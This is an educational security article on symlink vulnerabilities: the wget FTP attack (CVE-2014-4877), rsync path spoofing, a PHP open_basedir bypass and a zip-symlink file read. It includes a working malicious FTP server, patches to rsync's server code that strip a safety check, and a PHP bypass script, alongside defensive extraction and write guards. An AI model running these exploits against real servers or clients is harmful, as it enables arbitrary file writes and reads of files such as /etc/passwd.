Yaseng · 2015/01/27 10:01

0x00 Preface


Linux is the most widely used open source operating system, and its file system can be regarded as one of the core components behind its power. Within that file system, the symbolic link is like the "moonlight box" of legend: it travels through time and space, freely crossing otherwise strict path restrictions. That property gives it an important place in the whole system, and it is also why improper handling of symbolic links can cause all kinds of security problems. This article uses practical analysis of real cases to examine those problems, in the hope of drawing attention to them.

0x01 Client


When a client processes files recursively, symbolic link traversal can lead to arbitrary file writes and code execution.

Case study:

1. Wget FTP symbolic link attack (CVE-2014-4877)


When wget mirrors an FTP site recursively, for example with wget -m ftp://127.0.0.1, the attacker's server returns the following forged directory listing:

```
lrwxrwxrwx  1 root root   33 Oct 11  2013 fakedir -> /tmp
drwxrwxr-x 15 root root 4096 Oct 11  2013 fakedir
```

The first entry presents fakedir as a symbolic link to /tmp, so wget creates a local symlink of that name. The second entry presents fakedir as a directory, so wget then sends CWD fakedir followed by LIST, and at that point the server can forge any files or directories it likes, for example:

```
-rwx------  1 root root   21 Aug 29  2013 pwned
```

When wget downloads pwned, the RETR command returns whatever contents (binary or text) the server chooses, and wget writes them through the local fakedir symlink. In this way the wget client can be tricked into writing into any directory.

Exploit script: https://github.com/yaseng/pentest/blob/master/exploit/wget-symlink_attack_exploit.py

Vulnerability demo:

```
Server (attacker):  wget-symlink_attack_exploit.py
Client (victim):    wget -m ftp://127.0.0.1
```
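The attacker's side of the exchange above, as an added example that is not the page's exploit script: a minimal FTP server model whose root listing presents fakedir first as a symlink and then as a directory, and whose RETR serves the file once the client has changed into fakedir. The listing lines are the ones shown on the page; the port (2121, so no root is needed), the /tmp target and the payload bytes are assumptions. A victim would be pointed at it with wget -m ftp://127.0.0.1:2121/.

```python
"""Model of the attacker's FTP server in the wget symlink attack (added example)."""
import socket
import socketserver

SYMLINK_TARGET = "/tmp"                     # where the victim's local fakedir link will point (assumed)
PAYLOAD = b"written through a symlink\n"    # constructed file contents

# One listing that names "fakedir" twice: first as a symlink, then as a directory.
ROOT_LISTING = (
    "lrwxrwxrwx   1 root root %d Oct 11  2013 fakedir -> %s\r\n"
    "drwxrwxr-x  15 root root 4096 Oct 11  2013 fakedir\r\n"
) % (len(SYMLINK_TARGET), SYMLINK_TARGET)
FAKEDIR_LISTING = "-rwx------   1 root root %d Aug 29  2013 pwned\r\n" % len(PAYLOAD)


class AttackSession:
    """FTP command handling for one control connection, without the data sockets."""

    def __init__(self):
        self.cwd = "/"

    def handle(self, line):
        """Return (control reply, bytes for the data channel or None) for one command."""
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            return "331 Please specify the password.\r\n", None
        if cmd == "PASS":
            return "230 Login successful.\r\n", None
        if cmd == "SYST":
            return "215 UNIX Type: L8\r\n", None
        if cmd == "TYPE":
            return "200 Switching type.\r\n", None
        if cmd == "PWD":
            return '257 "%s"\r\n' % self.cwd, None
        if cmd == "CWD":
            target = arg.strip("/")
            if target in ("", "."):
                self.cwd = "/"
            elif target == "fakedir":
                self.cwd = "/fakedir"          # the client has already created the local symlink
            else:
                return "550 Failed to change directory.\r\n", None
            return "250 Directory successfully changed.\r\n", None
        if cmd == "LIST":
            listing = ROOT_LISTING if self.cwd == "/" else FAKEDIR_LISTING
            return "150 Here comes the directory listing.\r\n", listing.encode()
        if cmd == "RETR":
            if self.cwd == "/fakedir" and arg.strip("/") in ("pwned", "fakedir/pwned"):
                return "150 Opening BINARY mode data connection.\r\n", PAYLOAD
            return "550 Failed to open file.\r\n", None
        if cmd == "QUIT":
            return "221 Goodbye.\r\n", None
        return "502 Command not implemented.\r\n", None


class Handler(socketserver.StreamRequestHandler):
    """Wire AttackSession to real sockets, with passive-mode data connections."""

    def handle(self):
        session, listener = AttackSession(), None
        self.wfile.write(b"220 (symlink attack ftpd)\r\n")
        for raw in self.rfile:
            line = raw.decode("latin-1")
            if line.upper().startswith("PASV"):
                listener = socket.socket()
                listener.bind((self.server.server_address[0], 0))
                listener.listen(1)
                host, port = listener.getsockname()
                self.wfile.write(("227 Entering Passive Mode (%s,%d,%d).\r\n"
                                  % (host.replace(".", ","), port // 256, port % 256)).encode())
                continue
            reply, payload = session.handle(line)
            if payload is not None and listener is None:
                reply, payload = "425 Use PASV first.\r\n", None
            self.wfile.write(reply.encode())
            if payload is not None:
                conn, _ = listener.accept()     # the client connected right after the 227 reply
                conn.sendall(payload)
                conn.close()
                listener.close()
                listener = None
                self.wfile.write(b"226 Transfer complete.\r\n")
            if line.upper().startswith("QUIT"):
                break


if __name__ == "__main__":
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer(("127.0.0.1", 2121), Handler) as server:
        server.serve_forever()
```

The model only knows the commands a default wget mirror sends (USER/PASS/SYST/TYPE/PWD/CWD/PASV/LIST/RETR); anything else gets a 502, which wget tolerates.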

2. Rsync path spoofing attack (CVE-2014-9512)


After analysing the wget vulnerability, the author found that rsync can also be fooled by symbolic links when it synchronises files recursively. Because rsync's two-way file transfer protocol is more complex, the file list cannot simply be forged with strings as in the FTP case; instead the server's own code is modified. First, create a symbolic link in the rsync shared directory that points to /root/:

```
# ls -lh
total 8.0K
-rw-r--r-- 1 root root    2 Oct 31 03:16 1.txt
lrwxrwxrwx 1 root root    6 Oct 31 05:09 fakedir -> /root/
drwxr-xr-x 2 root root 4.0K Oct 31 05:08 truedir
```

Write a test file in truedir:

```
# cd truedir/
# ls
# echo rsync test > pwned
# ls -lh
total 4.0K
-rw-r--r-- 1 root root 11 Oct 31 05:17 pwned
```

Then modify the server-side code that sends the file list (rsync-3.1.1, flist.c, line 394) so that the entry for truedir/pwned is sent under the symlink path fakedir/pwned:

```c
/* file: rsync-3.1.1/flist.c, line 394 */
static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
			    const char *symlink_name, int symlink_len,
#endif
			    int ndx, int first_ndx)
{
	if (strcmp(fname, "truedir/pwned") == 0) {
		/* change the file's true path (truedir) to the symbolic link (fakedir) */
		fname = "fakedir/pwned";
	}
```

Because the server validates transfer requests strictly, the transfer aborts with the error "received request to transfer non-regular file: 7 [sender]" and the client cannot synchronise. But the attacker controls the server side, so just find the corresponding check and comment it out:

```c
/*
	if (iflags & ITEM_TRANSFER) {
		int i = ndx - cur_flist->ndx_start;
		if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
			rprintf(FERROR,
				"received request to transfer non-regular file: %d [%s]\n",
				ndx, who_am_i());
			exit_cleanup(RERR_PROTOCOL);
		}
	}
*/
```

Vulnerability demo:

client(victim):
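Both client cases in this section, wget and rsync, come down to the same receiver-side defect: a file name taken from the remote listing is written through a local symlink, whether the link came from the same listing (wget) or from the attacker's patched file list (rsync). The guard below is an added example, not wget or rsync code: every path component is opened relative to the previous directory descriptor with O_NOFOLLOW, so a planted link (fakedir -> /tmp, fakedir -> /root/) makes the open fail instead of being followed. It assumes Linux or macOS (dir_fd support) and uses temporary directories in place of /tmp and /root.

```python
"""Receiver-side guard against writes through symbolic links (added example)."""
import errno
import os
import shutil
import tempfile


class UnsafePath(Exception):
    pass


def split_remote_name(relpath):
    """Reject absolute names and '..'; return the clean component list."""
    if os.path.isabs(relpath):
        raise UnsafePath("absolute path from remote: %r" % relpath)
    parts = [p for p in relpath.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise UnsafePath("empty or traversing path from remote: %r" % relpath)
    return parts


def safe_write(root, relpath, data):
    """Create relpath under root without ever following a symlink.

    Each directory is opened relative to the previous directory fd with
    O_NOFOLLOW, so a symlink at any level fails with ELOOP rather than being
    traversed; the final file is created the same way. Returns the path written.
    """
    parts = split_remote_name(relpath)
    dir_flags = os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW
    fd = os.open(root, dir_flags)
    try:
        for part in parts[:-1]:
            try:
                os.mkdir(part, 0o755, dir_fd=fd)
            except FileExistsError:
                pass  # a real directory, or a planted symlink: the open below decides
            try:
                next_fd = os.open(part, dir_flags, dir_fd=fd)
            except OSError as exc:
                if exc.errno in (errno.ELOOP, errno.ENOTDIR):
                    raise UnsafePath("%s is a symlink or not a directory" % part) from exc
                raise
            os.close(fd)
            fd = next_fd
        try:
            file_fd = os.open(parts[-1], os.O_WRONLY | os.O_CREAT | os.O_TRUNC | os.O_NOFOLLOW,
                              0o644, dir_fd=fd)
        except OSError as exc:
            if exc.errno == errno.ELOOP:
                raise UnsafePath("%s is a symlink" % parts[-1]) from exc
            raise
        with os.fdopen(file_fd, "wb") as fh:
            fh.write(data)
    finally:
        os.close(fd)
    return os.path.join(root, *parts)


def demo():
    """Replay the attack: the mirror directory already holds fakedir -> <outside dir>."""
    root = tempfile.mkdtemp(prefix="mirror-")
    outside = tempfile.mkdtemp(prefix="outside-")   # stands in for /tmp or /root (constructed)
    os.symlink(outside, os.path.join(root, "fakedir"))
    results = {}
    try:
        safe_write(root, "fakedir/pwned", b"pwned\n")
        results["fakedir/pwned"] = "written"
    except UnsafePath:
        results["fakedir/pwned"] = "refused"
    safe_write(root, "truedir/pwned", b"rsync test\n")
    results["truedir/pwned"] = "written"
    results["outside_untouched"] = os.listdir(outside) == []
    shutil.rmtree(root)
    shutil.rmtree(outside)
    return results


if __name__ == "__main__":
    print(demo())
```

A plain lstat-then-write check would close the same hole in the common case but leaves a window in which the link can be swapped in between the check and the write; opening by descriptor removes that window.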

0x02 Web application


When files are served over HTTP, a web server that handles symbolic links improperly can expose them to unauthorized access, arbitrary file reads and similar risks.

Case study:

1. PHP open_basedir bypass to read arbitrary files


Use mkdir and symlink to build a chain of links that resolves to the target, as follows:

```php
<?php
// abc/etc/passwd is created as a directory so that the link target exists inside open_basedir
mkdir("abc");   chdir("abc");
mkdir("etc");   chdir("etc");
mkdir("passwd");
chdir("..");
// a four-level abc/abc/abc/abc chain, deep enough for the ../../../ below
mkdir("abc");   chdir("abc");
mkdir("abc");   chdir("abc");
mkdir("abc");   chdir("abc");
chdir(".."); chdir(".."); chdir(".."); chdir("..");
symlink("abc/abc/abc/abc", "tmplink");
symlink("tmplink/../../../etc/passwd", "exploit");   // resolves to abc/etc/passwd for now
unlink("tmplink");   // delete the link ...
mkdir("tmplink");    // ... and replace it with a real directory
?>
```

The generated files:

```
drwxr-xr-x  4 www www  512 Oct 20 00:37 abc
lrwxr-xr-x  1 www www   27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
-rw-r--r--  1 www www  356 Oct 20 00:32 kakao.php
-rw-r--r--  1 www www   45 Oct 20 00:26 sym.php
drwxr-xr-x  2 www www  512 Oct 20 00:37 tmplink
```

When symlink() was called, tmplink/../../../etc/passwd resolved to abc/etc/passwd, inside open_basedir, so PHP allowed it. Now that tmplink is a real directory, exploit resolves to ../../etc/passwd relative to the script directory, i.e. the real /etc/passwd. Requesting exploit as a static file through a web server such as Apache (which follows the link when FollowSymLinks is enabled, as it is by default) reads the file, bypassing the open_basedir protection, which only constrains PHP itself.
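The check-time versus use-time gap is the whole trick, so here it is made concrete: an added Python example (not the page's PHP code) that replays the same mkdir/symlink sequence in a temporary directory standing in for the web root, and reports what exploit resolves to before and after tmplink is swapped, together with whether a realpath-based open_basedir check would accept each result. The temporary directory and the inside_basedir() helper are assumptions of the example.

```python
"""Why the open_basedir bypass works: check at symlink() time, resolve at open() time.

Added example replaying the PHP script's sequence in a temporary directory.
"""
import os
import shutil
import tempfile


def build_chain(base):
    """Same layout the PHP script creates: abc/etc/passwd as a directory (so the
    target exists and resolves inside base) and a 4-deep abc chain for tmplink."""
    os.makedirs(os.path.join(base, "abc", "etc", "passwd"))
    os.makedirs(os.path.join(base, "abc", "abc", "abc", "abc"))
    os.symlink("abc/abc/abc/abc", os.path.join(base, "tmplink"))
    os.symlink("tmplink/../../../etc/passwd", os.path.join(base, "exploit"))


def swap_tmplink(base):
    """unlink("tmplink"); mkdir("tmplink"); from the PHP script."""
    os.unlink(os.path.join(base, "tmplink"))
    os.mkdir(os.path.join(base, "tmplink"))


def resolve_exploit(base):
    """What anything opening `exploit` will actually read."""
    return os.path.realpath(os.path.join(base, "exploit"))


def inside_basedir(base, resolved):
    """The test an open_basedir-style check applies to a resolved path (assumed model)."""
    base = os.path.realpath(base)
    return resolved == base or resolved.startswith(base + os.sep)


def demo():
    base = tempfile.mkdtemp(prefix="webroot-")   # stands in for the open_basedir directory
    try:
        build_chain(base)
        before = resolve_exploit(base)   # abc/etc/passwd under base: the check passes
        swap_tmplink(base)
        after = resolve_exploit(base)    # ../../etc/passwd relative to base: outside
        real = os.path.realpath(base)
        return {
            "base": real,
            "grandparent": os.path.dirname(os.path.dirname(real)),
            "before": before,
            "after": after,
            "before_allowed": inside_basedir(base, before),
            "after_allowed": inside_basedir(base, after),
        }
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())
```

The number of ../ components has to match the depth of the script directory below the filesystem root; the page's three levels reach /etc/passwd when the web root is two directories deep.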

2. Facebook local file read


When a server automatically decompresses uploaded archives in a format that can carry symbolic links (zip, tar and others), a symlink inside the archive can be used to read files on the server. The Facebook local file read is one example:

1. Create a symbolic link to /etc/passwd: ln -s /etc/passwd link
2. Pack it, keeping the link as a link: zip --symlinks test.zip link
3. Upload the archive; the server decompresses it automatically.
4. The contents of the server's /etc/passwd are displayed.

As shown in figure
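The four steps above, as an added example that is not Facebook's code or the write-up's: build_symlink_zip() does in Python what zip --symlinks does (a member whose UNIX mode bits say "symlink" and whose data is the link target), symlink_members() is the check an upload handler should run before extracting, extract_like_unzip() reproduces an extractor that honours the flag (the behaviour the vulnerable server must have had), and safe_extract() is the hardened form. The member name, target and temporary directories are constructed for the example.

```python
"""Symlink members in zip archives: how they are made, detected and refused (added example)."""
import io
import os
import stat
import tempfile
import zipfile


def build_symlink_zip(name, target):
    """Return zip bytes with one member that is a symlink to `target` (zip --symlinks)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        info = zipfile.ZipInfo(name)
        info.create_system = 3                        # 3 = UNIX: high 16 bits of external_attr are st_mode
        info.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(info, target)                     # a symlink member's data is its target path
    return buf.getvalue()


def symlink_members(data):
    """List (name, target) for every member whose mode bits mark it as a symlink."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                found.append((info.filename, zf.read(info).decode()))
    return found


def extract_like_unzip(data, dest):
    """Vulnerable extractor: recreates symlink members, as unzip does."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                os.symlink(zf.read(info).decode(), os.path.join(dest, info.filename))
            else:
                zf.extract(info, dest)


def safe_extract(data, dest):
    """Hardened extractor: refuse symlinks, absolute names and '..' components."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                raise ValueError("refusing symlink member %r" % info.filename)
            if info.filename.startswith("/") or ".." in info.filename.split("/"):
                raise ValueError("refusing unsafe member name %r" % info.filename)
            zf.extract(info, dest)


def demo():
    """Build the archive from the write-up and extract it both ways."""
    data = build_symlink_zip("link", "/etc/passwd")
    dest = tempfile.mkdtemp(prefix="unzip-")
    extract_like_unzip(data, dest)
    link = os.path.join(dest, "link")   # reading this file now reads the server's /etc/passwd
    result = {
        "members": symlink_members(data),
        "is_link": os.path.islink(link),
        "points_to": os.readlink(link),
    }
    try:
        safe_extract(data, tempfile.mkdtemp(prefix="safe-"))
        result["safe"] = "extracted"
    except ValueError:
        result["safe"] = "refused"
    return result


if __name__ == "__main__":
    print(demo())
```

Python's own zipfile.extractall() happens to write a symlink member as a regular file containing the target string, so it is not affected; unzip and most other tools create the link. The tar equivalent applies too: tarfile recreates symlink members unless extraction is run with the "data" filter available from Python 3.12.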

0x03 Reference links


1. CVE-2014-4877 wget FTP download directory link spoofing vulnerability: http://xteam.baidu.com/?p=30

2. Rsync path spoofing attack vulnerability: http://xteam.baidu.com/?p=169

3. PHP open_basedir bypass: http://cxsecurity.com/issue/WLB-2009110068

4. Reading local files from Facebook's server: http://josipfranjkovic.blogspot.com/2014/12/reading-local-files-from-facebooks.html